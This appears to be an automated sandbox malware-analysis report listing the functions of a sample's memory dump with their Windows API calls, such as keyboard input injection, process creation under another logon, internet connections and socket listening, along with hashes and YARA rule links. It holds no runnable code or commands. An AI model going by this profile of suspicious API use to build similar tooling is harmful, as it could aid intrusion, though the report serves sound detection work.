                                                                                                                  • Instruction ID: 8e5de4ae6e046d9ee3df3bcd59d4227fc62b54d6cd8c39ebdeca48c74fb6bc02
                                                                                                                  • Opcode Fuzzy Hash: 71491af8b76f4de25785c85a677b9bc885cca877470e0d993602836ecec85210
                                                                                                                  • Instruction Fuzzy Hash: E851A8306043069BDB24AF76D4A16EEB3E5EF44314F20A81FE566EB2D3DB7098C09721
                                                                                                                  Function 00E4C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(01095F30,?), ref: 00E4C544
                                                                                                                  • ScreenToClient.USER32(?,00000002), ref: 00E4C574
                                                                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00E4C5DA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3880355969-0
                                                                                                                  • Opcode ID: 067ac3c6a541020e00f0175b4f8a28fc675f6b19238d439f8e2eebe7e6b86779
                                                                                                                  • Instruction ID: 760dccaac65b243504c150b99ca246c6db536417c300fe8e392b90fc8adea18d
                                                                                                                  • Opcode Fuzzy Hash: 067ac3c6a541020e00f0175b4f8a28fc675f6b19238d439f8e2eebe7e6b86779
                                                                                                                  • Instruction Fuzzy Hash: 01517071A01104EFCF10DF69E8809AE7BB5EB49764F209299F915EB290D770ED41CB90
                                                                                                                  Function 00E1C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E1C462
                                                                                                                  • __itow.LIBCMT ref: 00E1C49C
                                                                                                                    • Part of subcall function 00E1C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E1C753
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E1C505
                                                                                                                  • __itow.LIBCMT ref: 00E1C55A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3379773720-0
                                                                                                                  • Opcode ID: 877a8c9a77a9b336adb7274b84d688ec0f034a02cda4326532ac5d5b14decac8
                                                                                                                  • Instruction ID: 9661ec1d5022d0a5b5db03a182c25dd02e0c2ade0c28629f7fa37b536be09c50
                                                                                                                  • Opcode Fuzzy Hash: 877a8c9a77a9b336adb7274b84d688ec0f034a02cda4326532ac5d5b14decac8
                                                                                                                  • Instruction Fuzzy Hash: CF41D171A00208AFDF21EF54C852BEE7BBAEF48744F001059FA05F7281DB709A858BB1
                                                                                                                  Function 00E2390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E23966
                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E23982
                                                                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00E239EF
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00E23A4D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 432972143-0
                                                                                                                  • Opcode ID: a602950ca8eb54aaff8173248cd77d2ac62d1a8de7c65966d791c7ef13538ac6
                                                                                                                  • Instruction ID: b30382196a74dfe4784ef87711a616370d3ce653bf5d1a4d1caa3bd239d61021
                                                                                                                  • Opcode Fuzzy Hash: a602950ca8eb54aaff8173248cd77d2ac62d1a8de7c65966d791c7ef13538ac6
                                                                                                                  • Instruction Fuzzy Hash: 0D412770E04228AEEF218B75A8057FDBBB99B96315F04211AE5C2721C1C7BC8EC4DB65
                                                                                                                  Function 00E2E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E2E742
                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00E2E768
                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E2E78D
                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E2E7B9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3321077145-0
                                                                                                                  • Opcode ID: 1e7706acdc7f2d5d0059dc2709ca988ee292f8cb9547fe7bc2a117f6817bb9d7
                                                                                                                  • Instruction ID: 026f971aa2f362c855f3f631cb2c61aeddab880f8d9c4c9b858c4361932d5cad
                                                                                                                  • Opcode Fuzzy Hash: 1e7706acdc7f2d5d0059dc2709ca988ee292f8cb9547fe7bc2a117f6817bb9d7
                                                                                                                  • Instruction Fuzzy Hash: 97415A39600660DFCF11EF16D954A5DBBE5FF59710B198099E946AB3A2CB70FC00CBA1
                                                                                                                  Function 00E4B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E4B5D1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InvalidateRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 634782764-0
                                                                                                                  • Opcode ID: ba4a021b69aba49bcaa69008ccb2a49f4fd5320a89cab7c983ee68a0646692c0
                                                                                                                  • Instruction ID: bf409cd73931c5970b7c6b2eeb37028d7f64d2814c61c9bfbc18ba117aa5fcc2
                                                                                                                  • Opcode Fuzzy Hash: ba4a021b69aba49bcaa69008ccb2a49f4fd5320a89cab7c983ee68a0646692c0
                                                                                                                  • Instruction Fuzzy Hash: A2312234600208BFEF209F19EC85FEDB76AEB46354F65A141FA12F62E1C734E9409B51
                                                                                                                  Function 00E4D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00E4D807
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00E4D87D
                                                                                                                  • PtInRect.USER32(?,?,00E4ED5A), ref: 00E4D88D
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00E4D8FE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1352109105-0
                                                                                                                  • Opcode ID: 2a81ca2cb729596d235debc2cd2de465558c9f4805b89de3ee2b4fe3c746ab69
                                                                                                                  • Instruction ID: bcda266e10b93bc8c9379c5808fed970ec1aa96969ee9cd31913eb3cf6f2d8a4
                                                                                                                  • Opcode Fuzzy Hash: 2a81ca2cb729596d235debc2cd2de465558c9f4805b89de3ee2b4fe3c746ab69
                                                                                                                  • Instruction Fuzzy Hash: 9441AB70A08218DFCB19DF5AEC84BA97BF5FB8E754F1891A9E415EB260D330E945CB40
                                                                                                                  Function 00E23A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E23AB8
                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E23AD4
                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00E23B34
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E23B92
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 432972143-0
                                                                                                                  • Opcode ID: 0c20a9aa129bc3f64c7e69d76e1d962e3ee848ab3e4a8c5184080ba2a5000746
                                                                                                                  • Instruction ID: 548290df8fa5387c601c8a66a10e350c76894c606e65917d48c17ef21b539f35
                                                                                                                  • Opcode Fuzzy Hash: 0c20a9aa129bc3f64c7e69d76e1d962e3ee848ab3e4a8c5184080ba2a5000746
                                                                                                                  • Instruction Fuzzy Hash: 68312470A00268AEEF308F74A8197FEBBA59B55315F04121AE482B21D1C7B88F85DF61
                                                                                                                  Function 00E14004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E14038
                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00E14066
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00E14094
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00E140CA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3058430110-0
                                                                                                                  • Opcode ID: 932d64fedac3878f8303eb3acca350530d84538aebc88ce3fe22a800a99c7bdb
                                                                                                                  • Instruction ID: 8c53ada83e60a39cb5bdd6658e59dbfc29336591a3734ca18a4e007b4601f727
                                                                                                                  • Opcode Fuzzy Hash: 932d64fedac3878f8303eb3acca350530d84538aebc88ce3fe22a800a99c7bdb
                                                                                                                  • Instruction Fuzzy Hash: 4431F2B0600206AFDB219F36CC44BEA7BE5FF48314F155028E660AB2D0E731D8D0D791
                                                                                                                  Function 00E3431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E34358
                                                                                                                    • Part of subcall function 00E343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E34401
                                                                                                                    • Part of subcall function 00E343E2: InternetCloseHandle.WININET(00000000), ref: 00E3449E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1463438336-0
                                                                                                                  • Opcode ID: a01de633c989e1053c4604f2c858e9b45aacb08ae1a1582e2afa99073a050854
                                                                                                                  • Instruction ID: d243782c5593acbe82cbe96dff3f5bb56048e3acd636716e3da07683bb10cc0f
                                                                                                                  • Opcode Fuzzy Hash: a01de633c989e1053c4604f2c858e9b45aacb08ae1a1582e2afa99073a050854
                                                                                                                  • Instruction Fuzzy Hash: 3521D4B2604601BFDB159F609C04FBBBFE9FF44714F00501AFA15A7690D771A824DB90
                                                                                                                  Function 00E1AF64 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E1AFAE
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00E1AFB5
                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00E1AFCF
                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E1AFFE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2621361867-0
                                                                                                                  • Opcode ID: 54810f42be3472c938821a01f767dc0289a64adea390966ab0064392292e3af9
                                                                                                                  • Instruction ID: 8d36b6a6b41ac82d76cc2f04d605c6a719b21ebb24a01b67d47909cfb26ccc55
                                                                                                                  • Opcode Fuzzy Hash: 54810f42be3472c938821a01f767dc0289a64adea390966ab0064392292e3af9
                                                                                                                  • Instruction Fuzzy Hash: 91217F72605209AFCB128FA5ED09BEE7BA9EB48348F084025F901B2161C3759DA5DB61
                                                                                                                  Function 00E38A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00E38AE0
                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00E38AF2
                                                                                                                  • accept.WS2_32(00000000,00000000,00000000), ref: 00E38AFF
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00E38B16
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastacceptselect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 385091864-0
                                                                                                                  • Opcode ID: f61042f5ae57e548a09536490ea52b08aea6b21763119769f1c77de6e2e256de
                                                                                                                  • Instruction ID: 59e3a8321c6731dd6c57acb5a53ebbc1059a40de3a5261e79c247fddd4ac61c0
                                                                                                                  • Opcode Fuzzy Hash: f61042f5ae57e548a09536490ea52b08aea6b21763119769f1c77de6e2e256de
                                                                                                                  • Instruction Fuzzy Hash: 0421D871A001249FC7209F69DD84AAEBBFCEF49350F00816AF849E7290DB74D944CFA0
                                                                                                                  Function 00E48A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00E48AA6
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E48AC0
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E48ACE
                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E48ADC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2169480361-0
                                                                                                                  • Opcode ID: c36be384cc7b4e534eea1d35297e210c9d3891264ee733234ff97ddae0c0ca07
                                                                                                                  • Instruction ID: 4c4a305b231c16f8679a727b33b004979aea496bb3152c66190b22738983f02c
                                                                                                                  • Opcode Fuzzy Hash: c36be384cc7b4e534eea1d35297e210c9d3891264ee733234ff97ddae0c0ca07
                                                                                                                  • Instruction Fuzzy Hash: EA11BE31745110AFE744AB29ED05FBE7799EF85320F284119F926E72E1CFB0AC0097A4
                                                                                                                  Function 00E20AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E21E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E20ABB,?,?,?,00E2187A,00000000,000000EF,00000119,?,?), ref: 00E21E77
                                                                                                                    • Part of subcall function 00E21E68: lstrcpyW.KERNEL32(00000000,?,?,00E20ABB,?,?,?,00E2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E21E9D
                                                                                                                    • Part of subcall function 00E21E68: lstrcmpiW.KERNEL32(00000000,?,00E20ABB,?,?,?,00E2187A,00000000,000000EF,00000119,?,?), ref: 00E21ECE
                                                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E20AD4
                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00E2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E20AFA
                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E20B2E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
